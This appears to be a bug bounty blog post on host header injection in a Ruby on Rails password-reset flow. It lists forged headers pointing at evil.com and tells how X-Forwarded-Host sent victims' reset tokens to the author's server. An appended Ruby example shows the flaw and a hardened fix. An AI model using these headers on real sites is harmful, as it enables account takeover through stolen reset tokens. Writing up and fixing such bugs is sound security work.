Pwn Them All #BugBounty

Recently I was pentesting a private program. The web app was built on Ruby on Rails, and I was testing its 'forgot password' functionality, of course, why not?


I was surprised when I saw that the endpoint was vulnerable to Host Header Injection, so here are the steps of how I was able to exploit it. First I fired up a local Python server on port 8080 along with ngrok on port 80.

[image: python server with ngrok]

I fired up Burp and Firefox and typed the URL again to capture the request for further testing. I typed my email into the forgot-password form and, when I intercepted the request, first tried every header like:

```http
X-Host: evil.com
X-Server: evil.com
X-Forwarded-For: evil.com
X-Forwarded-Host: evil.com
```
[image: password reset form]

[image: captured request]

I tried every header, and the one that worked for me here was:

```http
X-Forwarded-Host: evil.com
```

[image: confirmation]

I got confirmation that the email had been sent to my email.

[image: the host changed to my host]

The original host was replaced by the evil host (my ngrok host). Now when victims click the link, I get a request containing the user's password reset token.

[image: victims click and the code is sent to my server]
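Why the forwarded header steers the link, and how the app should have pinned the host, as an added Ruby example (not code from the post or from the tested application; the header handling, the `/password/reset` path and the `example.com` canonical host are assumptions):

```ruby
# Added example (not from the original post): how a password-reset link
# ends up pointing at an attacker-controlled host, and how to pin it.
# Header names and the app structure are assumptions; 'example.com' is a
# constructed canonical host.
require 'uri'

CANONICAL_HOST = 'example.com'.freeze

# Mimics how a Rack-style framework resolves request.host: a proxy header
# such as X-Forwarded-Host, when present, overrides the Host header.
def effective_host(headers)
  headers['X-Forwarded-Host'] || headers['Host']
end

# Vulnerable: the reset URL is built from whatever host the request carried.
def reset_link_vulnerable(headers, token)
  "https://#{effective_host(headers)}/password/reset?token=#{token}"
end

# Hardened: the host comes from configuration, never from the request.
# A request whose presented host disagrees with the configured host is
# rejected (and should be logged), so a forged header cannot steer the link.
def reset_link_hardened(headers, token, canonical_host = CANONICAL_HOST)
  presented = effective_host(headers)
  unless presented == canonical_host
    raise ArgumentError, "unexpected host in reset request: #{presented.inspect}"
  end
  URI::HTTPS.build(host: canonical_host,
                   path: '/password/reset',
                   query: "token=#{token}").to_s
end

# Constructed sample request: legitimate Host, attacker-supplied override.
FORGED_HEADERS = {
  'Host' => CANONICAL_HOST,
  'X-Forwarded-Host' => 'evil.com'
}.freeze

if __FILE__ == $PROGRAM_NAME
  token = 'TOKEN_PLACEHOLDER'
  puts "vulnerable: #{reset_link_vulnerable(FORGED_HEADERS, token)}"
  begin
    reset_link_hardened(FORGED_HEADERS, token)
  rescue ArgumentError => e
    puts "hardened:   rejected (#{e.message})"
  end
end
```

In Rails terms the fix is the same idea: set `config.action_mailer.default_url_options` and `config.hosts` to the canonical host rather than deriving mailer URLs from `request.host`.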
